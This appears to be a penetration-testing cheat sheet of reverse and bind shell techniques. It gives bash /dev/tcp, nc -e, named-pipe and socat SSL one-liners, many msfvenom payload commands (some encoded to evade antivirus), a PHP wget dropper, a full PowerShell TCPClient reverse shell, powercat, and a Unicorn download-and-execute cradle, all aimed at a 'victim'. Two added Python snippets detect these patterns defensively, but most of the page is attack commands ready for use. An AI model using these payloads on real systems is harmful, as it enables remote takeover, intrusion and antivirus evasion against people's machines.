akde/infosec

Information security is ultimately about managing risk


If the Meterpreter shell hangs, try pressing Enter several times on the victim.

Setting up

  • Listen on a system that can be reached, e.g. with
nc -lnvp 9998 [l=listen, v=verbose, p=port, n=no name resolution]
  • Then initiate the connection from the target system. Here is an example directly in PHP:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?>
Another example, e.g. runnable directly in a console:
nc -e /bin/sh 10.0.3.4 4444
Another interesting approach, e.g. if nc doesn't have the -e flag:
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc $attackerip 4444 1>/tmp/backpipe
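The connect-back techniques listed above leave recognisable traces in process-creation or auditd EXECVE logs. As an added example (not part of the original notes), here is a small Python detector that flags those traces: the `/dev/tcp/` redirection, `nc -e`, the mknod/named-pipe relay and `socat ... EXEC:`. The log lines are constructed for the example.

```python
"""Flag command lines that match the reverse-shell patterns listed above.

Added example: a defender-side detector for process-creation / auditd
EXECVE command lines. The sample log below is constructed, not captured.
"""
import re

# Each rule: (name, regex). The regexes mirror the techniques on this page.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("nc_exec_flag", re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+\S*(?:sh|cmd(?:\.exe)?)\b")),
    ("named_pipe_relay", re.compile(
        r"\b(?:mknod|mkfifo)\s+\S+.*\|\s*(?:nc|ncat|netcat)\b", re.S)),
    ("socat_exec", re.compile(r"\bsocat\b.*\bEXEC:")),
]


def classify(cmdline: str) -> list:
    """Return the names of all rules that the command line triggers."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Yield (line_number, matched_rules, cmdline) for every flagged line."""
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            yield n, hits, line.strip()


# Constructed sample: benign lines plus one line per technique from the page.
SAMPLE_LOG = [
    "ls -la /var/www/html",
    "bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'",
    "nc -e /bin/sh 10.0.3.4 4444",
    "mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc 10.0.3.4 4444 1>/tmp/backpipe",
    "socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash",
    "nc -lnvp 9998",  # a plain listener: no -e and no /dev/tcp, so not flagged
]

if __name__ == "__main__":
    for n, hits, line in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)} :: {line}")
```

Feed it the command-line field of your own EDR or auditd export instead of SAMPLE_LOG; the listener line shows that a bare `nc -l` is deliberately not treated as an indicator by these rules.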

Improving

rlwrap improves the shell:
rlwrap nc ...

With socat and SSL

First, create a certificate and combine it into a PEM file.
openssl req -newkey rsa:4096 -nodes -keyout bind_shell.key -x509 -days 42 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Reverse shell on Linux, receiving on Windows

Then, bind a shell on Linux
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
And open it from Windows (the port must be given, as in the Linux client below)
socat.exe - OPENSSL:192.168.119.158:443,verify=0

Reverse shell on Windows, receiving on Linux

Open the listener on Windows
socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:'cmd.exe',pipes
Open it from Linux
socat - OPENSSL:192.168.119.158:443,verify=0

Windows

  1. Upload nc.exe
  2. Local: Start a listener like
    1. rlwrap nc -lvp 4444
  3. Remote: export shell like 
    1. nc.exe -e cmd.exe 10.10.14.37 4444
Alternative 
  1. Upload nc.exe
  2. Victim: Start the netcat listener
    nc -dLp 4444 -e cmd.exe
  3. Local: in Metasploit:
    use multi/handler
    set LPORT 4444
    set RHOST $victim
    set PAYLOAD payload/windows/x64/shell_bind_tcp
    run

Possible problems

If entering a password in a reverse shell doesn't work…
sudo: no tty present and no askpass program specified
… a TTY shell must be opened. Options (see the python pty one-liners at the end of this page):

Generate

Binary executable for Linux:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
Binary meterpreter executable for Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=4455 -f elf > shell.elf
Perl reverse shell
msfvenom -p cmd/unix/reverse_perl LHOST=10.11.0.174 LPORT=4444 -f raw
Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=10.11.0.174 LPORT=4444 -f raw
PHP reverse shell
msfvenom -p php/reverse_php LHOST=10.11.0.174 LPORT=4444 -f raw
PHP meterpreter (if this doesn't work because a shell inside meterpreter won't work, use nc to export the bash to a local nc listener.)
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.11.0.174 LPORT=4444 -f raw
ASP-Reverse-Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.158 LPORT=4444 -f asp > s.asp
Tomcat/WAR reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
PowerShell reverse shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.119.158 LPORT=443 -f psh --out reverse_shell.ps1
(If this doesn't work, use the make_reverse_powershell.py script or the original from here.)
JSP reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -f raw > rs.jsp
Then with Metasploit:
> use multi/handler
> set PAYLOAD php/meterpreter/reverse_tcp
> set LHOST 10.10.10.10
> set LPORT 4444
> exploit
Hex output: use the -hex h.hex param

Windows

Windows reverse shell for metasploit:
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p32.exe
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p64.exe
Windows bind shell (needs a running nc -lvp 443)
msfvenom -p windows/shell_reverse_tcp lhost=192.168.119.158 lport=443 -f exe > root.exe
Windows reverse meterpreter shell for metasploit:
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.119.158 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p32.exe
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/p64.exe
Windows reverse shell for nc:
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o p32.exe
msfvenom -a x64 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.119.158 LPORT=443 -b "\x00" -e x86/shikata_ga_nai -f exe -o p64.exe
If none of this works, switch to nc binding!
Other sources for web shells: https://tools.kali.org/maintaining-access/webshells
Use GreatSCT if you have problems with anti-virus solutions.

PHP

Clever idea: only trigger a download when executed; the file then sits somewhere on the target.
<?php system("/usr/local/bin/wget http://10.11.0.174/r.php -O /usr/local/www/apache24/data/r.php") ?>

PowerShell

Listen normally with nc; then, on the victim, you can start a reverse shell handler natively:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Alternative: use Powercat on your own system. Create the encoded reverse shell code as follows:
powercat -c 10.11.0.4 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1
Now start a nc listener as usual. Then, on the victim, just execute the base64-encoded code:
powershell.exe -E ZgB1AG4AYwB0AGkAb...
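Both PowerShell variants above (the TCPClient one-liner and the base64 blob passed to `-E`) are what a defender sees in process-creation events. As an added example (not from the original notes), this Python helper decodes the `-EncodedCommand` argument, which PowerShell expects as base64 over UTF-16LE, and checks the result for the indicators visible in the one-liner: a raw TCPClient, a GetStream/Read loop and Invoke-Expression. The sample scripts are constructed.

```python
"""Decode a PowerShell -E/-EncodedCommand argument and flag reverse-shell indicators.

Added example for triaging process-creation events. PowerShell takes the -E
argument as base64 over UTF-16LE; encode_command() reproduces that so the
sample below can be built offline. Sample scripts are constructed.
"""
import base64
import re

# Indicators taken from the one-liner shown above.
INDICATORS = {
    "tcp_client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "stream_read_loop": re.compile(r"\.GetStream\(\).*\.Read\(", re.I | re.S),
    "remote_eval": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}


def encode_command(script: str) -> str:
    """Produce what 'powershell -E' expects: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(arg: str) -> str:
    """Reverse of encode_command; tolerates missing '=' padding."""
    arg = arg.strip()
    arg += "=" * (-len(arg) % 4)
    return base64.b64decode(arg).decode("utf-16-le", errors="replace")


def extract_encoded_arg(cmdline: str):
    """Return the base64 blob following -e/-ec/-enc/-encodedcommand, or None."""
    m = re.search(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return m.group(1) if m else None


def triage(cmdline: str) -> dict:
    """Decode the encoded command (if any) and list the indicators it matches."""
    blob = extract_encoded_arg(cmdline)
    if blob is None:
        return {"encoded": False, "script": None, "indicators": []}
    script = decode_encoded_command(blob)
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"encoded": True, "script": script, "indicators": hits}


# Constructed samples: a benign encoded command and a fragment of the page's one-liner.
BENIGN = "Get-Date | Out-String"
SHELL_FRAGMENT = ("$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);"
                  "$stream = $client.GetStream();$i = $stream.Read($bytes, 0, $bytes.Length);"
                  "iex $data")

if __name__ == "__main__":
    for script in (BENIGN, SHELL_FRAGMENT):
        print(triage("powershell.exe -E " + encode_command(script))["indicators"])
```

The truncated blob on the page, `ZgB1AG4AYwB0AGkA...`, decodes with this helper to the start of the word `function`, which is how a powercat-generated script begins.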

Unicorn

Create the reverse shell code
unicorn.py windows/meterpreter/reverse_http $local_ip $local_port
This creates a powershell_attack.txt.
  1. Copy this file together with unicorn.rc into a directory.
  2. Start metasploit with msfconsole -r unicorn.rc
  3. In another terminal, start a web server which can deliver the powershell_attack.txt file
  4. On the victim, execute the following
    1. powershell "IEX(New-Object Net.webclient).downloadstring('http://local:port/powershell_attack.txt')"
  5. A shell is now open in Metasploit.

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';